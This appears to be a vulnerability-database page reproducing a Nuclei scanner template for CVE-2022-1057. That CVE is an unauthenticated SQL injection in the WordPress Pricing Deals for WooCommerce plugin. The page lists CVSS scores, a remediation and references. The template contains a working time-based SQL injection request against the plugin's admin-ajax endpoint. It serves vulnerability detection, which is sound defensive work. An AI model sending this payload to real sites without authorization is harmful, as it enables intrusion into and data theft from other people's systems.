Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-1057
HistoryOct 21, 2022 - 1:28 p.m.

WordPress Pricing Deals for WooCommerce <=2.0.2.02 - SQL Injection

2022-10-2113:28:20
ProjectDiscovery
github.com
8
wordpress
wp-plugin
cve
sqli
wpscan
unauth
varktech
pricing-deals-for-woocommerce

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.04 Low

EPSS

Percentile

92.2%

WordPress Pricing Deals for WooCommerce plugin through 2.0.2.02 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
id: CVE-2022-1057

info:
  name: WordPress Pricing Deals for WooCommerce <=2.0.2.02 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    WordPress Pricing Deals for WooCommerce plugin through 2.0.2.02 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database.
  remediation: |
    Update to the latest version of the Pricing Deals for WooCommerce plugin (2.0.2.03 or higher) to fix the SQL Injection vulnerability.
  reference:
    - https://wpscan.com/vulnerability/7c33ffc3-84d1-4a0f-a837-794cdc3ad243
    - https://wordpress.org/plugins/pricing-deals-for-woocommerce/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1057
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1057
    cwe-id: CWE-89
    epss-score: 0.03633
    epss-percentile: 0.9168
    cpe: cpe:2.3:a:varktech:pricing_deals_for_woocommerce:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: varktech
    product: pricing_deals_for_woocommerce
    framework: wordpress
  tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,pricing-deals-for-woocommerce,unauth,varktech

http:
  - raw:
      - |
        @timeout: 15s
        GET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 500'
          - 'contains(body, "been a critical error")'
        condition: and
# digest: 490a004630440220101c6a007bafbe5c2ecad30655ed17c398ddf531ee9dc351a19c87045fdeddbb02207b672a00e3fa854f2406645d17e9ff44f1c257933afe0f04a7e5331f36ffc3e1:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.04 Low

EPSS

Percentile

92.2%

Related for NUCLEI:CVE-2022-1057